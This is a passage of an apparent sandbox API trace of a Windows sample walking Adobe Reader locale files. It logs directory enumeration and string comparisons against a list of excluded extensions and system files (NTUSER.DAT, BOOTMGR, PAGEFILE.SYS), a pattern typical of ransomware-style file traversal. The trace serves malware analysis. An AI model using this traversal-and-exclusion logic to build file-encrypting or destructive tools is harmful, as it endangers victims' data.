ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.NOR", cAlternateFileName="")) returned 0 [0058.524] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.524] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ee9f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ee9f60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl_NL", cAlternateFileName="")) returned 1 [0058.524] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ee9f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ee9f60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.527] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ee9f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ee9f60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.527] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9aab80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xae00, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.NLD", cAlternateFileName="ACCESS~1.NLD")) returned 1 [0058.527] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cd4c20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x69400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.NLD", cAlternateFileName="")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x801d5ec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.NLD", cAlternateFileName="ADOBEC~1.NLD")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82bca280, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.NLD", cAlternateFileName="")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820558a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.NLD", cAlternateFileName="BRDLAN~1.NLD")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cfad80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1f400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.NLD", cAlternateFileName="")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cfad80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x21400, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.NLD", cAlternateFileName="")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cfad80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.NLD", cAlternateFileName="")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e519e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.NLD", cAlternateFileName="")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cd4c20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.NLD", cAlternateFileName="")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cfad80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.NLD", cAlternateFileName="")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da69260, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0x0, dwReserved1=0x0, cFileName="makeaccessible.NLD", cAlternateFileName="MAKEAC~1.NLD")) returned 1 [0058.528] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d795840, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.NLD", cAlternateFileName="MULTIM~1.NLD")) returned 1 [0058.529] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9f6e40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="pddom.NLD", cAlternateFileName="")) returned 1 [0058.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="NLD", cchCount2=3) returned 3 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="NLD", cchCount2=3) returned 3 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="NLD", cchCount2=3) returned 3 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="PDDOM.NLD", cchCount2=9) returned 3 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="PDDOM.NLD", cchCount2=9) returned 1 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="PDDOM.NLD", cchCount2=9) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="PDDOM.NLD", cchCount2=9) returned 3 [0058.531] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cfad80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x84200, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLITE.NLD", cAlternateFileName="")) returned 1 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="NLD", cchCount2=3) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="NLD", cchCount2=3) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="NLD", cchCount2=3) returned 3 [0058.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="PPKLITE.NLD", cchCount2=11) returned 3 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="PPKLITE.NLD", cchCount2=11) returned 1 [0058.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="PPKLITE.NLD", cchCount2=11) returned 3 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="PPKLITE.NLD", cchCount2=11) returned 3 [0058.533] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f804400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x155c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.NLD", cAlternateFileName="")) returned 1 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="NLD", cchCount2=3) returned 3 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="NLD", cchCount2=3) returned 3 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="NLD", cchCount2=3) returned 3 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="RDLANG32.NLD", cchCount2=12) returned 3 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="RDLANG32.NLD", cchCount2=12) returned 1 [0058.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="RDLANG32.NLD", cchCount2=12) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="RDLANG32.NLD", cchCount2=12) returned 3 [0058.535] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ee9f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.NLD", cAlternateFileName="READOU~1.NLD")) returned 1 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="NLD", 